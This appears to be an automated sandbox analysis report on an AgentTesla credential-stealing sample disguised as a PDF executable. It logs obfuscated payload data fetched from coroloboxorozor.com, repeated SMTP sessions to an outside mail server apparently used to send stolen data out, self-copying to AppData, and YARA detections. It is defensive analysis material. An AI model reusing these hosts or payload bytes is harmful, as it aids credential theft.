                                                    Data Raw: 37 63 39 37 0d 0a 3c 70 3e 47 47 46 59 6a 46 69 63 63 46 6a 46 75 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6c 41 41 46 6c 41 41 46 6a 46 6a 46 69 4c 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 72 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 6a 46 6a 46 69 63 46 75 69 46 69 4c 72 46 69 63 46 6a 46 69 4c 6a 46 59 46 6c 6a 41 46 75 75 46 69 4c 63 46 69 46 47 72 46 6c 6a 41 46 75 75 46 4c 63 46 69 6a 63 46 69 6a 41 46 69 69 41 46 75 6c 46 69 69 6c 46 69 69 63 46 69 69 69 46 69 6a 75 46 69 69 63 46 59 47 46 69 6a 59 46 75 6c 46 59 59 46 59 47 46 69 69 6a 46 69 69 6a 46 69 69 69 46 69 69 72 46 75 6c 46 59 4c 46 69 6a 69 46 75 6c 46 69 69 63 46 69 69 47 46 69 69 6a 46 75 6c 46 69 6a 41 46 69 69 6a 46 75 6c 46 72 4c 46 47 59 46 4c 75 46 75 6c 46 69 6a 59 46 69 69 69 46 69 6a 6a 46 69 6a 69 46 63 72 46 69 75 46 69 75 46 69 6a 46 75 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 4c 6a 46 72 59 46 6a 46 6a 46 47 72 46 69 46 75 46 6a 46 47 72 46 69 63 6c 46 63 69 46 69 4c 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 63 46 6a 46 75 63 46 6a 46 69 69 46 69 46 4c 6a 46 6a 46 6a 46 4c 63 46 41 46 6a 46 6a 46 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 6c 46 69 69 63 46 41 46 6a 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 69 6c 4c 46 41 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 6c 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a
                                                    Data Ascii: 7c97<p>GGFYjFiccFjFuFjFjFjFcFjFjFjFlAAFlAAFjFjFiLcFjFjFjFjFjFjFjFrcFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFilLFjFjFjFicFuiFiLrFicFjFiLjFYFljAFuuFiLcFiFGrFljAFuuFLcFijcFijAFiiAFulFiilFiicFiiiFijuFiicFYGFijYFulFYYFYGFiijFiijFiiiFiirFulFYLFijiFulFiicFiiGFiijFulFijAFiijFulFrLFGYFLuFulFijYFiiiFijjFijiFcrFiuFiuFijFurFjFjFjFjFjFjFjFLjFrYFjFjFGrFiFuFjFGrFiclFciFiLjFjFjFjFjFjFjFjFjFllcFjFucFjFiiFiFLjFjFjFLcFAFjFjFrFjFjFjFjFjFjFlllFiicFAFjFjFulFjFjFjFilLFAFjFjFjFjFilLFjFulFjFjFjFlFjFjFcFjFjFjFjFjFjFjFcFjFjFjFjFjFj
                                                    Feb 23, 2021 09:47:44.830859900 CET5076INData Raw: 46 6a 46 6a 46 69 59 6c 46 41 46 6a 46 6a 46 6c 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 46 6a 46 72 63 46 69 75 75 46 6a 46 6a 46 69 72 46 6a 46 6a 46 69 72 46 6a 46 6a 46 6a 46 6a 46 69 72 46 6a 46 6a 46 69 72 46 6a 46 6a 46 6a 46 6a 46 6a 46
                                                    Data Ascii: FjFjFiYlFAFjFjFlFjFjFjFjFjFjFlFjFrcFiuuFjFjFirFjFjFirFjFjFjFjFirFjFjFirFjFjFjFjFjFjFirFjFjFjFjFjFjFjFjFjFjFjFiccFiicFAFjFGAFjFjFjFjFilLFAFjFiurFuFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFirjFAFjFilFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjF
                                                    Feb 23, 2021 09:47:44.830888033 CET5077INData Raw: 46 75 63 46 6a 46 6a 46 69 6a 46 69 6c 4c 46 69 46 6a 46 6a 46 63 46 69 69 41 46 75 41 46 6a 46 6a 46 69 6a 46 69 6c 4c 46 6c 46 6a 46 6a 46 63 46 69 69 41 46 75 72 46 6a 46 6a 46 69 6a 46 69 6c 4c 46 75 46 6a 46 6a 46 63 46 69 69 41 46 75 47 46
                                                    Data Ascii: FucFjFjFijFilLFiFjFjFcFiiAFuAFjFjFijFilLFlFjFjFcFiiAFurFjFjFijFilLFuFjFjFcFiiAFuGFjFjFijFilLFcFjFjFcFclFuLFjFuFlAcFliFGFjFjFlGFclFuLFjFlFcjFcLFjFjFijFjFclFLlFjFlFcjFcLFjFjFijFjFlFiiAFAlFjFjFijFilAFcYFjFjFijFclFucFjFlFilLFGFjFjFcFclFLrFiiAFGYFj
                                                    Feb 23, 2021 09:47:44.830909014 CET5078INData Raw: 6a 46 69 6c 4c 46 69 75 75 46 69 46 6a 46 63 46 63 6c 46 72 6c 46 6a 46 6c 46 6c 46 4c 6a 46 69 63 6c 46 69 6a 41 46 6c 75 46 6c 69 4c 46 63 6a 46 6c 63 46 6a 46 6a 46 63 75 46 6a 46 63 6c 46 6c 72 46 63 6a 46 69 6a 75 46 6a 46 6a 46 72 46 63 6c
                                                    Data Ascii: jFilLFiuuFiFjFcFclFrlFjFlFlFLjFiclFijAFluFliLFcjFlcFjFjFcuFjFclFlrFcjFijuFjFjFrFclFjFjFlGFcLFlFjFiGcFjFjFjFiFjFjFiGFjFiicFiFjFjFiilFlAcFicFiFjFiicFcuFjFjFiilFlAcFicFlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcjFiFjFjFcuFiiiFluFjFjFijFlAcFicFcFjFA
                                                    Feb 23, 2021 09:47:44.830931902 CET5080INData Raw: 46 6a 46 41 72 46 41 72 46 6a 46 6a 46 6a 46 6c 41 63 46 69 75 46 63 46 6a 46 63 6a 46 6c 63 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 63 46 41 46 6a 46 6c 41 63 46 69 6c 46 41 46 6a 46 63 6a 46 6c 41 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 6c 46 6c
                                                    Data Ascii: FjFArFArFjFjFjFlAcFiuFcFjFcjFlcFjFjFijFlAcFicFAFjFlAcFilFAFjFcjFlAFjFjFijFlAcFilFlFjFcjFlrFjFjFijFliLFlAcFicFrFjFlAcFilFuFjFlAcFilFrFjFcjFlGFjFjFijFiiiFlLFjFjFijFuLFjFlAcFiuFcFjFcjFlYFjFjFijFlAcFicFGFjFlAcFilFGFjFALFiGLFlAAFlAAFlAAFlliFiGFjFjF
                                                    Feb 23, 2021 09:47:44.830955982 CET5081INData Raw: 69 47 46 6a 46 6a 46 6a 46 6c 41 63 46 69 75 46 63 46 6a 46 6c 41 63 46 6c 6c 46 6c 46 6a 46 6a 46 6c 47 46 69 69 69 46 75 6a 46 6a 46 6a 46 69 6a 46 6a 46 6c 6c 6a 46 6c 41 63 46 69 6c 46 75 46 6a 46 69 69 69 46 75 69 46 6a 46 6a 46 69 6a 46 6c
                                                    Data Ascii: iGFjFjFjFlAcFiuFcFjFlAcFllFlFjFjFlGFiiiFujFjFjFijFjFlljFlAcFilFuFjFiiiFuiFjFjFijFlAcFicFjFjFArFjFjFjFjFlAcFilFjFjFclFjFjFiFirFjFjFlFjFlLFjFijrFiucFjFiGFjFjFjFjFlGFcLFlFjFiGcFjFjFjFiFjFjFiGFjFiicFllYFjFjFiilFlAcFicFiFjFiicFiAFiFjFiilFlAcFicFlFj
                                                    Feb 23, 2021 09:47:44.830981970 CET5083INData Raw: 46 6c 46 6a 46 69 69 41 46 6c 69 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 63 46 75 46 6a 46 6c 41 63 46 69 6c 46 69 46 6a 46 63 6a 46 69 46 6a 46 6a 46 63 75 46 69 69 69 46 6c 75 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 63 46 63 46 6a 46 41 72 46 41
                                                    Data Ascii: FlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcjFiFjFjFcuFiiiFluFjFjFijFlAcFicFcFjFArFArFjFjFjFlAcFiuFcFjFcjFlcFjFjFijFlAcFicFAFjFlAcFilFAFjFcjFlAFjFjFijFlAcFilFlFjFcjFlrFjFjFijFliLFlAcFicFrFjFlAcFilFuFjFlAcFilFrFjFcjFlGFjFjFijFiiiFlLFjFjFijFuLFjFl
                                                    Feb 23, 2021 09:47:44.831006050 CET5084INData Raw: 46 75 4c 46 6a 46 6c 41 63 46 69 75 46 63 46 6a 46 63 6a 46 6c 59 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 63 46 47 46 6a 46 6c 41 63 46 69 6c 46 47 46 6a 46 41 4c 46 69 47 4c 46 6c 41 41 46 6c 41 41 46 6c 41 41 46 6c 6c 69 46 69 47 46 6a 46 6a 46
                                                    Data Ascii: FuLFjFlAcFiuFcFjFcjFlYFjFjFijFlAcFicFGFjFlAcFilFGFjFALFiGLFlAAFlAAFlAAFlliFiGFjFjFjFlAcFiuFcFjFlAcFllFlFjFjFlGFiiiFujFjFjFijFjFlljFlAcFilFuFjFiiiFuiFjFjFijFlAcFicFjFjFArFjFjFjFjFlAcFilFjFjFclFjFjFiFirFjFjFlFjFlLFjFijrFiucFjFiGFjFjFjFjFlGFcLFlF
                                                    Feb 23, 2021 09:47:44.831028938 CET5085INData Raw: 4c 46 6c 46 6a 46 69 47 63 46 6a 46 6a 46 6a 46 69 46 6a 46 6a 46 69 47 46 6a 46 69 69 63 46 75 47 46 6c 46 6a 46 69 69 6c 46 6c 41 63 46 69 63 46 69 46 6a 46 69 69 63 46 72 75 46 6c 46 6a 46 69 69 6c 46 6c 41 63 46 69 63 46 6c 46 6a 46 69 69 41
                                                    Data Ascii: LFlFjFiGcFjFjFjFiFjFjFiGFjFiicFuGFlFjFiilFlAcFicFiFjFiicFruFlFjFiilFlAcFicFlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcjFiFjFjFcuFiiiFluFjFjFijFlAcFicFcFjFArFArFjFjFjFlAcFiuFcFjFcjFlcFjFjFijFlAcFicFAFjFlAcFilFAFjFcjFlAFjFjFijFlAcFilFlFjFcjFlrFjFj
                                                    Feb 23, 2021 09:47:44.831051111 CET5087INData Raw: 6c 72 46 6a 46 6a 46 69 6a 46 6c 69 4c 46 6c 41 63 46 69 63 46 72 46 6a 46 6c 41 63 46 69 6c 46 75 46 6a 46 6c 41 63 46 69 6c 46 72 46 6a 46 63 6a 46 6c 47 46 6a 46 6a 46 69 6a 46 69 69 69 46 6c 4c 46 6a 46 6a 46 69 6a 46 75 4c 46 6a 46 6c 41 63
                                                    Data Ascii: lrFjFjFijFliLFlAcFicFrFjFlAcFilFuFjFlAcFilFrFjFcjFlGFjFjFijFiiiFlLFjFjFijFuLFjFlAcFiuFcFjFcjFlYFjFjFijFlAcFicFGFjFlAcFilFGFjFALFiGLFlAAFlAAFlAAFlliFiGFjFjFjFlAcFiuFcFjFlAcFllFlFjFjFlGFiiiFujFjFjFijFjFlljFlAcFilFuFjFiiiFuiFjFjFijFlAcFicFjFjFArF
                                                    Feb 23, 2021 09:47:44.832067013 CET5088INData Raw: 6a 46 6a 46 41 72 46 6a 46 6a 46 6a 46 6a 46 6c 41 63 46 69 6c 46 6a 46 6a 46 63 6c 46 6a 46 6a 46 69 46 69 72 46 6a 46 6a 46 6c 46 6a 46 6c 4c 46 6a 46 69 6a 72 46 69 75 63 46 6a 46 69 47 46 6a 46 6a 46 6a 46 6a 46 6c 47 46 63 4c 46 6c 46 6a 46
                                                    Data Ascii: jFjFArFjFjFjFjFlAcFilFjFjFclFjFjFiFirFjFjFlFjFlLFjFijrFiucFjFiGFjFjFjFjFlGFcLFlFjFiGcFjFjFjFiFjFjFiGFjFiicFlcGFlFjFiilFlAcFicFiFjFiicFluFuFjFiilFlAcFicFlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcjFiFjFjFcuFiiiFluFjFjFijFlAcFicFcFjFArFArFjFjFjFlA
                                                    Feb 23, 2021 09:47:46.399477959 CET6139OUTGET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Feb 23, 2021 09:47:46.466350079 CET6141INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:47:46 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d24528de8c514e2616fdb192ac59864401614070066; expires=Thu, 25-Mar-21 08:47:46 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:09 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086fabc5050000c785a38f9000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PqUUXu4f1rvXuUMAw85%2BUdAfZLkjsnMxkPsovmI8ZRJbqT5G%2Bpn7ksmsX%2BCgTSflESwRS41rZId7b6ZftfKm%2Fa0%2Bzc225%2FpIDrz1ZxPt3XGQVZM%2F"}],"max_age":604800,"group":"cf-nel"}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625faf1b3911c785-AMS
                                                    Data Raw: 33 64 38 31 0d 0a 3c 70 3e 63 46 69 4c 72 46 4c 41 46 6c 63 63 46 6c 63 63 46 69 6a 4c 46 6c 41 75 46 59 75 46 69 63 46 6c 6c 6a 46 69 69 63 46 69 72 69 46 72 6c 46 6c 69 72 46 6c 69 72 46 4c 59 46 6c 75 63 46 72 4c 46 6c 6c 6a 46 47 41 46 6c 69 47 46 6c 75 41 46 69 41 75 46 47 6c 46 6c 69 4c 46 69 75 6c 46 6c 69 46 69 4c 63 46 69 4c 63 46 69 75 47 46 6c 72 46 6c 41 6a 46 69 41 6a 46 69 6c 6c 46 72 46 6c 46 69 63 47 46 69 69 47 46 6c 6a 46 69 4c 72 46 69 69 59 46 6c 69 72 46 69 6a 47 46 6c 75 75 46 69 75 72 46 47 6a 46 6c 6c 41 46 47 6a 46 6c 6c 4c 46 63 63 46 69 59 59 46 47 59 46 6c 69 59 46 69 69 75 46 6a 46 6c 41 69 46 69 41 63 46 72 6a 46 72 6a 46 6c 6a 69 46 59 6a 46 6c 41 6a 46 69 41 6a 46 72 69 46 6c 6a 69 46 4c 63 46 6c 6c 59 46 63 69 46 6c 6a 6a 46 4c 69 46 69 63 46 6c 63 63 46 69 75 41 46 69 75 41 46 75 4c 46 69 72 6c 46 72 69 46 69 59 6a 46 59 6c 46 63 46 69 41 59 46 47 72 46 6c 69 72 46 59 72 46 6c 41 69 46 6c 6c 46 69 72 75 46 6c 69 63 46 69 63 63 46 69 63 4c 46 63 6a 46 6c 63 75 46 69 72 6a 46 75 6a 46 69 47 6c 46 41 41 46 6c 69 63 46 69 69 59 46 69 69 59 46 69 46 69 41 6c 46 69 6c 4c 46 6c 47 46 6c 4c 46 69 47 75 46 69 69 72 46 69 41 46 59 4c 46 6c 4c 46 75 46 69 41 69 46 72 63 46 6c 75 47 46 69 69 47 46 6c 6a 46 69 4c 6a 46 47 59 46 69 6c 47 46 41 47 46 6c 6c 41 46 69 69 63 46 69 63 41 46 75 69 46 69 6a 72 46 75 75 46 6c 6c 6c 46 69 69 47 46 69 63 41 46 63 6a 46 69 4c 41 46 47 47 46 6c 6a 46 69 41 63 46 72 47 46 72 47 46 63 47 46 6c 6a 6c 46 59 69 46 6c 75 72 46 41 4c 46 6c 69 75 46 63 72 46 63 72 46 6c 41 6c 46 69 41 69 46 69 69 41 46 63 47 46 69 4c 63
                                                    Data Ascii: 3d81<p>cFiLrFLAFlccFlccFijLFlAuFYuFicFlljFiicFiriFrlFlirFlirFLYFlucFrLFlljFGAFliGFluAFiAuFGlFliLFiulFliFiLcFiLcFiuGFlrFlAjFiAjFillFrFlFicGFiiGFljFiLrFiiYFlirFijGFluuFiurFGjFllAFGjFllLFccFiYYFGYFliYFiiuFjFlAiFiAcFrjFrjFljiFYjFlAjFiAjFriFljiFLcFllYFciFljjFLiFicFlccFiuAFiuAFuLFirlFriFiYjFYlFcFiAYFGrFlirFYrFlAiFllFiruFlicFiccFicLFcjFlcuFirjFujFiGlFAAFlicFiiYFiiYFiFiAlFilLFlGFlLFiGuFiirFiAFYLFlLFuFiAiFrcFluGFiiGFljFiLjFGYFilGFAGFllAFiicFicAFuiFijrFuuFlllFiiGFicAFcjFiLAFGGFljFiAcFrGFrGFcGFljlFYiFlurFALFliuFcrFcrFlAlFiAiFiiAFcGFiLc


                                                    SMTP Packets

                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                    Feb 23, 2021 09:47:41.559540987 CET58749763103.17.211.69192.168.2.4220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:47:40 +0800
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    Feb 23, 2021 09:47:41.560544968 CET49763587192.168.2.4103.17.211.69EHLO 965543
                                                    Feb 23, 2021 09:47:41.785818100 CET58749763103.17.211.69192.168.2.4250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
                                                    250-SIZE 20971520
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    Feb 23, 2021 09:47:41.786395073 CET49763587192.168.2.4103.17.211.69STARTTLS
                                                    Feb 23, 2021 09:47:42.016181946 CET58749763103.17.211.69192.168.2.4220 TLS go ahead
                                                    Feb 23, 2021 09:47:47.613730907 CET58749765103.17.211.69192.168.2.4220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:47:46 +0800
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    Feb 23, 2021 09:47:47.613986015 CET49765587192.168.2.4103.17.211.69EHLO 965543
                                                    Feb 23, 2021 09:47:47.846470118 CET58749765103.17.211.69192.168.2.4250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
                                                    250-SIZE 20971520
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    Feb 23, 2021 09:47:47.846772909 CET49765587192.168.2.4103.17.211.69STARTTLS
                                                    Feb 23, 2021 09:47:48.083342075 CET58749765103.17.211.69192.168.2.4220 TLS go ahead
                                                    Feb 23, 2021 09:48:37.896342993 CET58749775103.17.211.69192.168.2.4220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:48:36 +0800
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    Feb 23, 2021 09:48:37.898952961 CET49775587192.168.2.4103.17.211.69EHLO 965543
                                                    Feb 23, 2021 09:48:38.129041910 CET58749775103.17.211.69192.168.2.4250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
                                                    250-SIZE 20971520
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    Feb 23, 2021 09:48:38.132936954 CET49775587192.168.2.4103.17.211.69STARTTLS
                                                    Feb 23, 2021 09:48:38.366513968 CET58749775103.17.211.69192.168.2.4220 TLS go ahead
                                                    Feb 23, 2021 09:48:43.099941015 CET58749776103.17.211.69192.168.2.4220-cpsrv-02.onnet.my ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 16:48:41 +0800
                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                    220 and/or bulk e-mail.
                                                    Feb 23, 2021 09:48:43.100560904 CET49776587192.168.2.4103.17.211.69EHLO 965543
                                                    Feb 23, 2021 09:48:43.331737995 CET58749776103.17.211.69192.168.2.4250-cpsrv-02.onnet.my Hello 965543 [84.17.52.38]
                                                    250-SIZE 20971520
                                                    250-8BITMIME
                                                    250-PIPELINING
                                                    250-AUTH PLAIN LOGIN
                                                    250-STARTTLS
                                                    250 HELP
                                                    Feb 23, 2021 09:48:43.332259893 CET49776587192.168.2.4103.17.211.69STARTTLS
                                                    Feb 23, 2021 09:48:43.568871021 CET58749776103.17.211.69192.168.2.4220 TLS go ahead

                                                    Code Manipulations

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: A4-058000200390-10-14_REV_pdf.exe PID: 7040 Parent PID: 5816

                                                    General

                                                    Start time:09:46:47
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe'
                                                    Imagebase:0x8a0000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 1364 Parent PID: 7040

                                                    General

                                                    Start time:09:46:54
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: conhost.exe PID: 6328 Parent PID: 1364

                                                    General

                                                    Start time:09:46:54
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: timeout.exe PID: 2228 Parent PID: 1364

                                                    General

                                                    Start time:09:46:54
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 1
                                                    Imagebase:0x1300000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: A4-058000200390-10-14_REV_pdf.exe PID: 1572 Parent PID: 7040

                                                    General

                                                    Start time:09:46:57
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    Imagebase:0xa50000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.912000692.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: WerFault.exe PID: 6300 Parent PID: 7040

                                                    General

                                                    Start time:09:46:59
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588
                                                    Imagebase:0x240000
                                                    File size:434592 bytes
                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: NewApp.exe PID: 2092 Parent PID: 3424

                                                    General

                                                    Start time:09:47:32
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                    Imagebase:0xc00000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 13%, ReversingLabs
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: NewApp.exe PID: 1216 Parent PID: 3424

                                                    General

                                                    Start time:09:47:40
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                    Imagebase:0x230000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.832293360.000000000380F000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 7132 Parent PID: 2092

                                                    General

                                                    Start time:09:47:45
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: conhost.exe PID: 1440 Parent PID: 7132

                                                    General

                                                    Start time:09:47:46
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: timeout.exe PID: 6576 Parent PID: 7132

                                                    General

                                                    Start time:09:47:46
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 1
                                                    Imagebase:0x1300000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: NewApp.exe PID: 6416 Parent PID: 2092

                                                    General

                                                    Start time:09:47:50
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Imagebase:0x520000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, Author: Joe Security
